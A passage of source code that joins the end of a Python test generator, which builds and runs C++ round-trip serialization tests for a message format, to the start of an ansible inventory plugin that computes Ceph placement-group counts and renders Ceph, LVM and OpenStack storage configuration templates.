    # that maps can be nested. This latter part is true for lists as well.
    #
    # Unfortunately there is only one callback per type, and so we'd need to build up some
    # datastructure that looks just like the AST being walked so we could easily generate multiple
    # internal pairs. This just happens to be one of the cases where walking the AST directly for
    # code generation is easier than using visitor callbacks. However, we use visitor callbacks to
    # prevent tying us to a specific AST structure and needing to modify every single code
    # generator.
    #
    # What we do because of this is just generate a single KV PAIR for now. Generating a single
    # pair just means using double brackets for map_start and map_end. We can think of more
    # sophisticated strategies later.
    def map_start(self):
        self.instance += "{{"
    def map_key_end(self):
        self.instance += ","
    def map_end(self):
        self.instance += "}}"
    def optional_start(self):
        self.instance += "{"
    def optional_end(self):
        self.instance += "}"
    # Pick one of the alternative message types and embed an instance of it.
    def oneof(self, msgs):
        name = random.choice(list(msgs.keys()))
        variable_instance = random.choice(self.existing_instances[name])
        self.instance += type_instance_from_variable_instance(
            variable_instance)
def testSerializationStr(msg_name):
    """
    Create a function that roundtrip serializes and deserializes all instances of a given message type.
    """
    # Function header, e.g. "void test_Foo_serialization() {".
    s = "void {}() {{\n".format(test_name(msg_name))
    # One scoped roundtrip check per generated instance (_foo0 .. _foo<MAX_SIZE-1>).
    for i in range(0, MAX_SIZE):
        instance = instance_name(msg_name, i)
        s += """
    {{
      std::vector<uint8_t> output;
      serialize(output, {});
      {} {}_computed;
      deserialize(output, {}_computed);
      assert({} == {}_computed);
    }}
""".format(instance, msg_name, instance, instance, instance, instance)
    s += "}\n"
    return s
def file_header(namespace):
    """Return the prologue (banner, includes, namespace opening) of the generated test file."""
    return f"""/***************************************
 Autogenerated by test_cppgen.py. Do not modify.
***************************************/
#include "example.hpp"
#include <cassert>
namespace {namespace} {{
"""
def file_trailer(namespace, ast):
    """Return the epilogue: close the namespace and emit main() invoking every message's test."""
    calls = "".join(
        "    {}::{}();\n".format(namespace, test_name(msg.name)) for msg in ast.msgs
    )
    epilogue = "\n}} // namespace {}\nint main() {{\n".format(namespace)
    return epilogue + calls + "}"
def generate_code_and_tests(ast, header_file):
    """ Walk concord message format(CMF) AST and generate C++ code and C++ tests"""
    namespace = "cmf::test"
    print("Generating C++ Message structs and serialization code")
    # cppgen produces the message structs (header) and serializers (code).
    header, code = cppgen.translate(ast, header_file, namespace)
    test_code = file_header(namespace)
    print("Generating C++ message instances and serialization tests")
    visitor = InstanceVisitor()
    # We generate `max_size` msg instances for tests
    # (the visitor accumulates instances across walks in existing_instances).
    for i in range(0, MAX_SIZE):
        visitor.size = i
        walker = Walker(ast, visitor)
        walker.walk()
    # Emit every generated instance, then one roundtrip test per message type.
    for msg_name, instances in visitor.existing_instances.items():
        for instance in instances:
            test_code += instance + "\n\n"
        test_code += testSerializationStr(msg_name)
    return header, code, test_code + file_trailer(namespace, ast)
def compile_cmf_lib():
    """Compile the generated CMF sources into libexample.so inside OUTPUT_DIR.

    Builds example.cpp into a position-independent object file and links it
    into a shared library. Fails fast (assert, matching the os.system pattern
    used in test_serialization) if either g++ step exits non-zero; previously
    a failed compile was silently ignored and only surfaced as a confusing
    failure in the later link/run steps.
    """
    print("Compiling CMF lib with g++")
    assert os.system(
        f"g++ -std=c++17 -g -c -fPIC -o {OUTPUT_DIR}/example.o {OUTPUT_DIR}/example.cpp"
    ) == 0, "compiling example.cpp failed"
    assert os.system(
        f"g++ -std=c++17 -shared -o {OUTPUT_DIR}/libexample.so {OUTPUT_DIR}/example.o"
    ) == 0, "linking libexample.so failed"
def compile_tests():
    """Compile the generated serialization test binary, linked against libexample.

    Fails fast (assert) if g++ exits non-zero; previously a compile failure
    was silently ignored and only surfaced when run_tests tried to execute a
    stale or missing binary.
    """
    print("Compiling tests with g++")
    assert os.system(
        f"g++ -std=c++17 -g -o {OUTPUT_DIR}/test_serialization -L{OUTPUT_DIR} {OUTPUT_DIR}/test_serialization.cpp -lexample"
    ) == 0, "compiling test_serialization failed"
def run_tests():
    """Run the compiled serialization test binary and report pass/fail."""
    print("Running tests")
    # The binary is linked against libexample.so living in OUTPUT_DIR.
    os.environ["LD_LIBRARY_PATH"] = OUTPUT_DIR
    status = os.system(f"./{OUTPUT_DIR}/test_serialization")
    print("Tests passed." if status == 0 else "Tests failed.")
def test_serialization():
    """
    1. Generate C++ code for messages from example.cmf and write it to example.h.
    2. Generate instances of the messages as well as tests that round trip serialize and deserialize them.
    3. Compile that C++ code via g++
    4. Run the compiled C++ code as a test
    """
    with open("../grammar.ebnf") as f:
        print("Reading ../grammar.ebnf")
        grammar = f.read()
    with open("../../example.cmf") as f2:
        print("Reading ../../example.cmf")
        cmf = f2.read()
    # Parse the message definitions against the CMF grammar into an AST.
    ast, _ = cmfc.parse(grammar, cmf)
    # Uncomment to show the generated AST for debugging purposes
    # pprint(ast)
    assert os.system(f'mkdir -p {OUTPUT_DIR}') == 0
    header, code, tests = generate_code_and_tests(ast, "example.hpp")
    # Write the generated library sources and the generated C++ test driver.
    with open(f"{OUTPUT_DIR}/example.hpp", "w") as f:
        f.write(header)
    with open(f"{OUTPUT_DIR}/example.cpp", "w") as f:
        f.write(code)
    with open(f"{OUTPUT_DIR}/test_serialization.cpp", "w") as f:
        f.write(tests)
    compile_cmf_lib()
    compile_tests()
    run_tests()
if __name__ == "__main__":
test_serialization()
| 30.149351 | 124 | 0.63655 |
d8a74a5fdc1484aabbe5d6736c27c87b2464123a | 55,277 | py | Python | inventoryhandlers/storageinventory/storageinventory.py | alexandruavadanii/cm-plugins | 5c3f9f389f46f719579ac4cd4065490b1723ebff | [
"Apache-2.0"
] | null | null | null | inventoryhandlers/storageinventory/storageinventory.py | alexandruavadanii/cm-plugins | 5c3f9f389f46f719579ac4cd4065490b1723ebff | [
"Apache-2.0"
] | null | null | null | inventoryhandlers/storageinventory/storageinventory.py | alexandruavadanii/cm-plugins | 5c3f9f389f46f719579ac4cd4065490b1723ebff | [
"Apache-2.0"
] | 1 | 2021-04-24T16:48:17.000Z | 2021-04-24T16:48:17.000Z | # Copyright 2019 Nokia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=missing-docstring,invalid-name,too-few-public-methods,too-many-instance-attributes,too-many-lines
import os
import json
import subprocess
from jinja2 import Environment
from cmframework.apis import cmansibleinventoryconfig
from cmframework.apis import cmerror
from cmdatahandlers.api import configerror
from serviceprofiles import profiles
import hw_detector.hw_detect_lib as hw
import math
# If rounding pg_num down to the nearest power of two would lose more than
# this fraction of the computed value, round up instead.
NEAREST_POWER_OF_2_PERCENTAGE = 0.25
# Target placement groups per OSD, keyed by expected cluster growth.
TARGET_PGS_PER_OSD_NO_INCREASE_EXPECTED = 100
TARGET_PGS_PER_OSD_UP_TO_DOUBLE_SIZE_INCREASE_EXPECTED = 200
TARGET_PGS_PER_OSD_TWO_TO_THREE_TIMES_SIZE_INCREASE_EXPECTED = 300
# Please visit ceph.com/pgcalc for details on previous values
# Floor for any computed pg_num.
MINIMUM_PG_NUM = 32
class PGNum(object):
    """Calculates the pg_num for the given attributes.

    Implements the formula from ceph.com/pgcalc:
    pgnum = (target_pgs * osds_in_pool * pool_percentage) / replicas,
    bounded below by MINIMUM_PG_NUM and rounded to a power of two.
    """

    def __init__(self, number_of_pool_osds, pool_data_percentage, number_of_replicas):
        self._number_of_pool_osds = number_of_pool_osds
        self._pool_data_percentage = pool_data_percentage
        self._number_of_replicas = number_of_replicas

    @staticmethod
    def _next_power_of_2(value):
        """Smallest power of 2 greater than or equal to value."""
        return 2 ** (value - 1).bit_length() if value > 0 else 1

    @staticmethod
    def _prev_power_of_2(value):
        """Largest power of 2 less than or equal to value."""
        return 2 ** (value.bit_length() - 1) if value > 0 else 1

    @staticmethod
    def _lower_power_too_far(distance, original):
        """True when rounding down drops more than the allowed share of the value.

        If the nearest power of 2 is more than 25% below the original value,
        the next higher power of 2 must be used (see ceph.com/pgcalc).
        """
        return float(float(distance) / float(original)) > NEAREST_POWER_OF_2_PERCENTAGE

    def _round_to_nearest_power_of_2(self, pgnum):
        lower = self._prev_power_of_2(pgnum)
        if pgnum != 0 and self._lower_power_too_far(pgnum - lower, pgnum):
            return self._next_power_of_2(pgnum)
        return lower

    def _raw_pgnum(self, number_of_pool_osds, pool_percentage):
        # target_pgs_per_osd x osds x data share / replica count
        return (TARGET_PGS_PER_OSD_UP_TO_DOUBLE_SIZE_INCREASE_EXPECTED
                * number_of_pool_osds * float(pool_percentage)
                / self._number_of_replicas)

    def _bounded_pgnum(self, number_of_pool_osds, pool_percentage):
        raw = self._raw_pgnum(number_of_pool_osds, pool_percentage)
        return int(math.ceil(max(raw, MINIMUM_PG_NUM)))

    def calculate(self):
        """ The formula of the calculation can be found from ceph.com/pgcalc.

        pgnum = (target_pgs x number_of_osds_in_pool x pool_percentage)/number_of_replicas
        return : rounded pgnum to the nearest power of 2
        """
        pgnum = self._bounded_pgnum(self._number_of_pool_osds, self._pool_data_percentage)
        return self._round_to_nearest_power_of_2(pgnum)
NUMBER_OF_POOLS = 4
SUPPORTED_INSTANCE_BACKENDS = ['default', 'cow', 'lvm']
ALL_DEFAULT_INSTANCE_BACKENDS = SUPPORTED_INSTANCE_BACKENDS + ['rbd']
DEFAULT_INSTANCE_LV_PERCENTAGE = "100"
USER_SECRETS = "/etc/openstack_deploy/user_secrets.yml"
# Ceph PG share percentages for Openstack pools
OSD_POOL_IMAGES_PG_NUM_PERCENTAGE = 0.09
OSD_POOL_VOLUMES_PG_NUM_PERCENTAGE = 0.69
OSD_POOL_VMS_PG_NUM_PERCENTAGE = 0.20
OSD_POOL_SHARED_PG_NUM_PERCENTAGE = 0.02
# Ceph PG share percentages for CaaS pools
OSD_POOL_CAAS_PG_NUM_PERCENTAGE = 1.0
DEFAULT_ROOTDISK_DEVICE = "/dev/sda"
# root disk partition 2 system volume group VG percentages
INSTANCE_NODE_VG_PERCENTAGE = 0.47
NOT_INSTANCE_NODE_VG_PERCENTAGE = 1
"""
/dev/sda1 fixed partition size : 50GiB fixed size = 10% of the total disk size
/dev/sda2 system VG partition size: 47% of remaining total disk size = 42% of total disk size
/dev/sda3 instance partition size 53% of remaining total disk size = 47% of total disk size
"""
JSON_EXTERNAL_CEPH_CINDER_BACKEND_HOST_VAR = """
{
{% for host in hosts %}
"{{ host.name }}": {
"ext_ceph_user": "{{ ext_ceph_user }}",
"ext_ceph_user_key": "{{ ext_ceph_user_key }}",
"cephkeys_access_group": "cephkeys",
"ceph_mons": [
{% for host in hosts %}
"{{ host.name }}"
{% if not loop.last %},{% endif %}
{% endfor %}],
"ext_ceph_fsid": "{{ ext_ceph_fsid }}",
"ext_ceph_mon_hosts": "{{ ext_ceph_mon_hosts }}",
"cinder_service_hostname": "{{ host.name }}",
"cinder_backends": {
"rbd": {
"volume_driver": "cinder.volume.drivers.rbd.RBDDriver",
"rbd_pool": "{{ cinder_pool_name }}",
"rbd_ceph_conf": "/etc/ceph/ceph.conf",
"ceph_conf": "/etc/ceph/ceph.conf",
"rbd_flatten_volume_from_snapshot": "false",
"rbd_max_clone_depth": "5",
"rbd_store_chunk_size": "4",
"rados_connect_timeout": "-1",
"volume_backend_name": "RBD",
"rbd_secret_uuid": "{{ cinder_ceph_client_uuid }}",
"rbd_user": "{{ ext_ceph_user }}",
"backend_host": "controller",
"rbd_exclusive_cinder_pool": "True"
}
},
"ext_openstack_pools": [
"{{ glance_pool_name }}",
"{{ cinder_pool_name }}",
"{{ nova_pool_name }}",
"{{ platform_pool_name }}"
],
"cinder_ceph_client": "{{ ext_ceph_user }}",
"nova_ceph_client": "{{ ext_ceph_user }}",
"glance_default_store": "rbd",
"glance_additional_stores": ["http", "cinder", "file"],
"glance_rbd_store_pool": "{{ glance_pool_name }}",
"glance_rbd_store_chunk_size": "8",
"glance_ceph_client": "{{ ext_ceph_user }}",
"ceph_conf": "/etc/ceph/ceph.conf"
} {% if not loop.last %},{% endif %}
{% endfor %}
}
"""
JSON_CINDER_BACKENDS_HOST_VAR = """
{
{%- set loopvar = {'first_entry': True} %}
{% for host in hosts %}
{% if host.is_controller %}
{%- if not loopvar.first_entry %},{%- endif %}
{%- if loopvar.update({'first_entry': False}) %}{%- endif %}
"{{ host.name }}": {
"cinder_service_hostname": "{{ host.name }}",
"cinder_backends": {
{% if openstack_storage == 'ceph' %}
"rbd": {
"volume_driver": "cinder.volume.drivers.rbd.RBDDriver",
"rbd_pool": "{{ cinder_pool_name }}",
"rbd_ceph_conf": "/etc/ceph/ceph.conf",
"ceph_conf": "/etc/ceph/ceph.conf",
"rbd_flatten_volume_from_snapshot": "false",
"rbd_max_clone_depth": "5",
"rbd_store_chunk_size": "4",
"rados_connect_timeout": "-1",
"volume_backend_name": "volumes_hdd",
"rbd_secret_uuid": "{{ cinder_ceph_client_uuid }}",
"rbd_user": "cinder",
"backend_host": "controller",
"rbd_exclusive_cinder_pool": "True"
}
{% endif %}
{% if openstack_storage == 'lvm' %}
"lvm": {
"iscsi_ip_address": "{{ installation_controller_ip }}",
"volume_backend_name": "LVM_iSCSI",
"volume_driver": "cinder.volume.drivers.lvm.LVMVolumeDriver",
"volume_group": "cinder-volumes"
}
{% endif %}
}
}
{% endif %}
{% endfor %}
}
"""
JSON_STORAGE_HOST_VAR = """
{
{%- set loopvar = {'first_entry': True} %}
{% for host in hosts %}
{% if host.is_rbd_ceph %}
{%- if not loopvar.first_entry %},{%- endif %}
{%- if loopvar.update({'first_entry': False}) %}{%- endif %}
"{{ host.name }}": {
"devices": [
{% for disk in host.ceph_osd_disks %}
"{{disk}}"
{%if not loop.last %},{% endif %}{% endfor %}]
}
{% endif %}
{% endfor %}
}
"""
JSON_STORAGE_HOST_DISK_CONFIGURATION = """
{
{% for host in hosts %}
"{{ host.name }}": {
"by_path_disks":
{ "os" : "{{ host.os_disk }}",
"osd" : "{{ host.ceph_osd_disks }}",
"osd_disks_ids" : "{{ host.osd_disks_ids }}"
},
"rootdisk_vg_percentage": "{{ host.vg_percentage }}",
"default_rootdisk_device": "{{ rootdisk_device }}"
} {% if not loop.last %},{% endif %}
{% endfor %}
}
"""
JSON_LVM_STORAGE_HOST_VAR = """
{
{% for host in hosts %}
"{{ host.name }}": {
"devices": [
{% for disk in host.cinder_disks %}
"{{disk}}"
{%if not loop.last %},{% endif %}{% endfor %}],
"cinder_physical_volumes": [
{% for disk in host.cinder_physical_volumes %}
"{{disk}}"
{%if not loop.last %},{% endif %}{% endfor %}]
} {% if not loop.last %},{% endif %}
{% endfor %}
}
"""
JSON_BARE_LVM_STORAGE_HOST_VAR = """
{
{% for host in hosts %}
"{{ host.name }}": {
{% if host.is_bare_lvm %}
"bare_lvm": {
"disks": [
{% for disk in host.bare_lvm_disks %}
"{{disk}}"
{%if not loop.last %},{% endif %}{% endfor %}],
"physical_volumes": [
{% for disk in host.bare_lvm_physical_volumes %}
"{{disk}}"
{%if not loop.last %},{% endif %}{% endfor %}],
"mount_options": "{{ host.mount_options }}",
"mount_dir": "{{ host.mount_dir }}",
"name": "{{ host.bare_lvm_lv_name }}"
}
{% endif %}
} {% if not loop.last %},{% endif %}
{% endfor %}
}
"""
JSON_DEVICE_HOST_VAR = """
{
{%- set loopvar = {'first_entry': True} %}
{% for host in hosts %}
{% if host.instance_physical_volumes %}
{%- if not loopvar.first_entry %},{%- endif %}
{%- if loopvar.update({'first_entry': False}) %}{%- endif %}
"{{ host.name }}": {
"instance_disks": [
{% for disk in host.instance_disks %}
"{{disk}}"
{%if not loop.last %},{% endif %}
{% endfor %}],
"instance_physical_volumes": [
{% for disk in host.instance_physical_volumes %}
"{{disk}}"
{%if not loop.last %},{% endif %}
{% endfor %}],
"instance_lv_percentage": "{{ host.instance_lv_percentage }}"
}
{% endif %}
{% endfor %}
}
"""
# /etc/ansible/roles/os_nova/templates/nova.conf.j2
JSON_NOVA_RBD_HOST_VAR = """
{
{% for host in hosts %}
"{{ host.name }}": {
"nova_libvirt_images_rbd_pool": "{{ nova_pool_name }}",
"nova_ceph_client": "{{ nova_ceph_client }}"
} {% if not loop.last %},{% endif %}
{% endfor %}
}
"""
#
# /opt/ceph-ansible/group_vars/osds.yml
JSON_OVERRIDE = """
{
"ceph_conf_overrides": {
"global": {
"mon_max_pg_per_osd": "400",
"mon_pg_warn_max_object_skew": "-1",
"osd_pool_default_size": "{{ osd_pool_default_size }}",
"osd_pool_default_min_size": "{{ osd_pool_default_min_size }}",
"osd_pool_default_pg_num": "{{ osd_pool_default_pg_num }}",
"osd_pool_default_pgp_num": "{{ osd_pool_default_pg_num }}",
"osd_heartbeat_grace": "3",
"osd_heartbeat_interval": "2",
"mon_osd_min_down_reporters": "1",
"mon_osd_adjust_heartbeat_grace": "false",
"auth_client_required": "cephx"
},
"mgr": {
"mgr_modules": "dashboard"
},
"mon": {
"mon_health_preluminous_compat_warning": "false",
"mon_health_preluminous_compat": "true",
"mon_timecheck_interval": "60",
"mon_sd_reporter_subtree_level": "device",
"mon_clock_drift_allowed": "0.1"
},
"osd": {
"osd_mon_heartbeat_interval": "10",
"osd_mon_report_interval_min": "1",
"osd_mon_report_interval_max": "15"
}
}
}
"""
JSON_OVERRIDE_CACHE = """
{
"ceph_conf_overrides": {
"global": {
"mon_max_pg_per_osd": "400",
"mon_pg_warn_max_object_skew": "-1",
"osd_pool_default_size": "{{ osd_pool_default_size }}",
"osd_pool_default_min_size": "{{ osd_pool_default_min_size }}",
"osd_pool_default_pg_num": "{{ osd_pool_default_pg_num }}",
"osd_pool_default_pgp_num": "{{ osd_pool_default_pg_num }}",
"osd_heartbeat_grace": "3",
"osd_heartbeat_interval": "2",
"mon_osd_adjust_heartbeat_grace": "false",
"bluestore_cache_size": "1073741824",
"auth_client_required": "cephx"
},
"mgr": {
"mgr_modules": "dashboard"
},
"mon": {
"mon_health_preluminous_compat_warning": "false",
"mon_health_preluminous_compat": "true",
"mon_timecheck_interval": "60",
"mon_sd_reporter_subtree_level": "device",
"mon_clock_drift_allowed": "0.1"
},
"osd": {
"osd_mon_heartbeat_interval": "10",
"osd_mon_report_interval_min": "1",
"osd_mon_report_interval_max": "15"
}
}
}
"""
JSON_OVERRIDE_3CONTROLLERS = """
{
"ceph_conf_overrides": {
"global": {
"mon_max_pg_per_osd": "400",
"mon_pg_warn_max_object_skew": "-1",
"osd_pool_default_size": "{{ osd_pool_default_size }}",
"osd_pool_default_min_size": "{{ osd_pool_default_min_size }}",
"osd_pool_default_pg_num": "{{ osd_pool_default_pg_num }}",
"osd_pool_default_pgp_num": "{{ osd_pool_default_pg_num }}",
"osd_heartbeat_grace": "3",
"osd_heartbeat_interval": "2",
"mon_osd_adjust_heartbeat_grace": "false",
"bluestore_cache_size": "1073741824",
"auth_client_required": "cephx"
},
"mgr": {
"mgr_modules": "dashboard"
},
"mon": {
"mon_health_preluminous_compat_warning": "false",
"mon_health_preluminous_compat": "true",
"mon_lease": "1.0",
"mon_election_timeout": "2",
"mon_lease_renew_interval_factor": "0.4",
"mon_lease_ack_timeout_factor": "1.5",
"mon_timecheck_interval": "60",
"mon_sd_reporter_subtree_level": "device",
"mon_clock_drift_allowed": "0.1"
},
"osd": {
"osd_mon_heartbeat_interval": "10",
"osd_mon_report_interval_min": "1",
"osd_mon_report_interval_max": "15"
}
}
}
"""
JSON_NETWORK = """
{
"public_network": "{{ public_networks }}",
"cluster_network": "{{ cluster_networks }}"
}
"""
JSON_OS_TUNING = """
{
"os_tuning_params": [{
"name": "vm.min_free_kbytes",
"value": "1048576"
}]
}
"""
JSON_OSD_POOL_PGNUMS = """
{
"osd_pool_images_pg_num": "{{ osd_pool_images_pg_num }}",
"osd_pool_volumes_pg_num": "{{ osd_pool_volumes_pg_num }}",
"osd_pool_vms_pg_num": "{{ osd_pool_vms_pg_num }}",
"osd_pool_shared_pg_num": "{{ osd_pool_shared_pg_num }}"{%- if 0 < osd_pool_caas_pg_num %},
"osd_pool_caas_pg_num": "{{ osd_pool_caas_pg_num }}"
{% endif %}
}
"""
JSON_CEPH_HOSTS = """
{
"ceph-mon": [ {% for host in mons %}"{{ host.name }}"{% if not loop.last %},{% endif %}{% endfor %} ],
"ceph-mon_hosts": [ {% for host in mons %}"{{ host.name }}"{% if not loop.last %},{% endif %}{% endfor %} ],
"mons": [ {% for host in mons %}"{{ host.name }}"{% if not loop.last %},{% endif %}{% endfor %} ],
"ceph_mons": [ {% for host in mons %}"{{ host.name }}"{% if not loop.last %},{% endif %}{% endfor %} ],
"ceph-osd": [ {% for host in osds %}"{{ host.name }}"{% if not loop.last %},{% endif %}{% endfor %} ],
"ceph-osd_hosts": [ {% for host in osds %}"{{ host.name }}"{% if not loop.last %},{% endif %}{% endfor %} ],
"osds": [ {% for host in osds %}"{{ host.name }}"{% if not loop.last %},{% endif %}{% endfor %} ],
"mgrs": [ {% for host in mgrs %}"{{ host.name }}"{% if not loop.last %},{% endif %}{% endfor %} ],
"ceph-mgr": [ {% for host in mgrs %}"{{ host.name }}"{% if not loop.last %},{% endif %}{% endfor %} ]
}
"""
# "storage_backend": ceph
# Replaces variables in /opt/openstack-ansible/playbooks/inventory/group_vars/glance_all.yml
JSON_GLANCE_CEPH_ALL_GROUP_VARS = """
{
{% for host in hosts %}
"{{ host.name }}": {
"glance_default_store": "rbd",
"glance_additional_stores": ["http", "cinder", "file"],
"glance_rbd_store_pool": "{{ glance_pool_name }}",
"glance_rbd_store_chunk_size": "8",
"ceph_conf": "/etc/ceph/ceph.conf"
} {% if not loop.last %},{% endif %}
{% endfor %}
}
"""
JSON_GLANCE_LVM_ALL_GROUP_VARS = """
{
{% for host in hosts %}
"{{ host.name }}": {
"glance_default_store": "file"
} {% if not loop.last %},{% endif %}
{% endfor %}
}
"""
# ceph-ansible variables must be set at host_vars -level
# ceph-ansible sample variables in group_vars
# group_vars - all.yml.sample
JSON_CEPH_ANSIBLE_ALL_HOST_VARS = """
{
{% for host in hosts %}
"{{ host.name }}": {
"mon_group_name": "mons",
"osd_group_name": "osds",
"mgr_group_name": "mgrs",
"ceph_stable_release": "luminous",
"generate_fsid": "true",
"cephx": "true",
"journal_size": "10240",
"osd_objectstore": "bluestore"
} {% if not loop.last %},{% endif %}
{% endfor %}
}
"""
# pylint: disable=line-too-long
# ceph-ansible
# group_vars - mons.yml.sample
JSON_CEPH_ANSIBLE_MONS_HOST_VARS = """
{
{% for host in hosts %}
"{{ host.name }}": {
"monitor_secret": "{{ '{{ monitor_keyring.stdout }}' }}",
"openstack_config": true,
"cephkeys_access_group": "cephkeys",
"openstack_pools": [
{
"name": "{{ platform_pool }}",
"pg_num": "{{ osd_pool_shared_pg_num }}",
"rule_name": ""
}{% if is_openstack_deployment %},
{
"name": "{{ glance_pool }}",
"pg_num": "{{ osd_pool_images_pg_num }}",
"rule_name": ""
},
{
"name": "{{ cinder_pool }}",
"pg_num": "{{ osd_pool_volumes_pg_num }}",
"rule_name": ""
},
{
"name": "{{ nova_pool }}",
"pg_num": "{{ osd_pool_vms_pg_num }}",
"rule_name": ""
}
{%- endif %}
{%- if is_caas_deployment and 0 < osd_pool_caas_pg_num %},
{
"name": "caas",
"pg_num": "{{ osd_pool_caas_pg_num }}",
"rule_name": ""
}
{%- endif %}
],
"openstack_keys": [
{
"acls": [],
"key": "{{ ceph_keys['client.shared'] }}",
"mode": "0600",
"mon_cap": "allow r",
"name": "client.shared",
"osd_cap": "allow class-read object_prefix rbd_children, allow rwx pool={{ platform_pool }}"
}{% if is_openstack_deployment %},
{
"acls": [],
"key": "{{ ceph_keys['client.glance'] }}",
"mode": "0640",
"mon_cap": "allow r",
"name": "client.glance",
"osd_cap": "allow class-read object_prefix rbd_children, allow rwx pool={{ glance_pool }}"
},
{
"acls": [],
"key": "{{ ceph_keys['client.cinder'] }}",
"mode": "0640",
"mon_cap": "allow r, allow command \\\\\\\\\\\\\\"osd blacklist\\\\\\\\\\\\\\"",
"name": "client.cinder",
"osd_cap": "allow class-read object_prefix rbd_children, allow rwx pool={{ cinder_pool }}, allow rwx pool={{ nova_pool }}, allow rx pool={{ glance_pool }}"
}
{%- endif %}
{%- if is_caas_deployment and 0 < osd_pool_caas_pg_num %},
{
"acls": [],
"key": "{{ ceph_keys['client.caas'] }}",
"mode": "0600",
"mon_cap": "allow r",
"name": "client.caas",
"osd_cap": "allow class-read object_prefix rbd_children, allow rwx pool=caas"
}
{%- endif %}
]
} {% if not loop.last %},{% endif %}
{% endfor %}
}
"""
# pylint: enable=line-too-long
# ceph-ansible
# group_vars - osds.yml.sample
JSON_CEPH_ANSIBLE_OSDS_HOST_VARS = """
{
{% for host in hosts %}
"{{ host.name }}": {
"raw_journal_devices": [],
"journal_collocation": true,
"raw_multi_journal": false,
"dmcrytpt_journal_collocation": false,
"dmcrypt_dedicated_journal": false,
"osd_scenario": "collocated",
"dedicated_devices": []
} {% if not loop.last %},{% endif %}
{% endfor %}
}
"""
JSON_SINGLE_CONTROLLER_VAR = """
{
{% for host in hosts %}
"{{ host.name }}": {
"single_controller_host": true
} {% if not loop.last %},{% endif %}
{% endfor %}
}
"""
class Host(object):
    """Mutable record describing one host's storage configuration.

    Populated by storageinventory._initialize_host_object(); plain data
    holder with no behavior of its own.
    """

    def __init__(self):
        # Unknown-until-configured attributes default to None.
        for attr in ('name', 'is_lvm', 'is_osd', 'is_mon', 'is_mgr',
                     'is_rbd_ceph', 'bare_lvm_disks', 'is_bare_lvm',
                     'bare_lvm_physical_volumes', 'mount_options',
                     'bare_lvm_lv_name'):
            setattr(self, attr, None)
        # Disk/volume collections each get a fresh, independent list.
        for attr in ('ceph_osd_disks', 'lvm_disks', 'cinder_disks',
                     'instance_physical_volumes', 'cinder_physical_volumes',
                     'instance_disks', 'osd_disks_ids'):
            setattr(self, attr, [])
        # Role flags are False until the host is classified.
        self.is_controller = False
        self.is_compute = False
        self.is_storage = False
        # String-valued settings default to empty.
        self.instance_lv_percentage = ""
        self.os_disk = ""
        self.mount_dir = ""
        # Non-instance nodes get the default volume-group percentage.
        self.vg_percentage = NOT_INSTANCE_NODE_VG_PERCENTAGE
class storageinventory(cmansibleinventoryconfig.CMAnsibleInventoryConfigPlugin):
    """Inventory plugin that renders storage-related (ceph / lvm / bare_lvm)
    host and group variables into the ansible inventory."""

    def __init__(self, confman, inventory, ownhost):
        super(storageinventory, self).__init__(confman, inventory, ownhost)
        # Host objects, bucketed by role during _init_host_data().
        self.hosts = []
        self.storage_hosts = []
        self.compute_hosts = []
        self.controller_hosts = []
        self._mon_hosts = []
        self._osd_hosts = []
        self._mgr_hosts = []
        self.single_node_config = False
        # Configuration handlers supplied by the config manager.
        self._networking_config_handler = self.confman.get_networking_config_handler()
        self._hosts_config_handler = self.confman.get_hosts_config_handler()
        self._storage_config_handler = self.confman.get_storage_config_handler()
        self._openstack_config_handler = self.confman.get_openstack_config_handler()
        self._sp_config_handler = self.confman.get_storage_profiles_config_handler()
        self._caas_config_handler = self.confman.get_caas_config_handler()
        # Fraction of placement groups reserved for caas vs openstack pools;
        # filled in by _set_ceph_pg_proportions().
        self._ceph_caas_pg_proportion = 0.0
        self._ceph_openstack_pg_proportion = 0.0
        # Lazily generated ceph client keys (see _ceph_keys property).
        self._ceph_keys_dict = None
        # Default pool names; overridden for external ceph deployments.
        self._cinder_pool_name = 'volumes'
        self._glance_pool_name = 'images'
        self._nova_pool_name = 'vms'
        self._platform_pool_name = 'shared'
        # Maps a storage-profile attribute to the backends it applies to and
        # the handler getter that reads it (see _get_storage_profile_attribute).
        self._storage_profile_attribute_properties = {
            'lvm_cinder_storage_partitions': {
                'backends': ['lvm'],
                'getter': self._sp_config_handler.get_profile_lvm_cinder_storage_partitions
            },
            'mount_options': {
                'backends': ['bare_lvm'],
                'getter': self._sp_config_handler.get_profile_bare_lvm_mount_options
            },
            'mount_dir': {
                'backends': ['bare_lvm'],
                'getter': self._sp_config_handler.get_profile_bare_lvm_mount_dir
            },
            'lv_name': {
                'backends': ['bare_lvm'],
                'getter': self._sp_config_handler.get_profile_bare_lvm_lv_name
            },
            'nr_of_ceph_osd_disks': {
                'backends': ['ceph'],
                'getter': self._sp_config_handler.get_profile_nr_of_ceph_osd_disks
            },
            'lvm_instance_storage_partitions': {
                'backends': ['lvm', 'bare_lvm'],
                'getter': self._sp_config_handler.get_profile_lvm_instance_storage_partitions
            },
            'lvm_instance_cow_lv_storage_percentage': {
                'backends': ['lvm'],
                'getter': self._sp_config_handler.get_profile_lvm_instance_cow_lv_storage_percentage
            },
            'openstack_pg_proportion': {
                'backends': ['ceph'],
                'getter': self._sp_config_handler.get_profile_ceph_openstack_pg_proportion
            },
            'caas_pg_proportion': {
                'backends': ['ceph'],
                'getter': self._sp_config_handler.get_profile_ceph_caas_pg_proportion
            },
        }
    def _is_host_managment(self, host):
        """True if *host* carries the management service profile.

        NOTE(review): 'managment' spelling kept for call-site compatibility.
        """
        return self._is_profile_in_hosts_profiles(profiles.Profiles.get_management_service_profile(), host)

    def _is_host_controller(self, host):
        """True if *host* carries the controller service profile."""
        return self._is_profile_in_hosts_profiles(profiles.Profiles.get_controller_service_profile(), host)

    def _is_profile_in_hosts_profiles(self, profile, host):
        """True if *profile* appears among *host*'s configured service profiles."""
        node_service_profiles = self._hosts_config_handler.get_service_profiles(host)
        return profile in node_service_profiles

    def _is_host_compute(self, host):
        """True if *host* carries the compute service profile."""
        return self._is_profile_in_hosts_profiles(profiles.Profiles.get_compute_service_profile(), host)

    def _is_host_caas_master(self, host):
        """True if *host* carries the caas master service profile."""
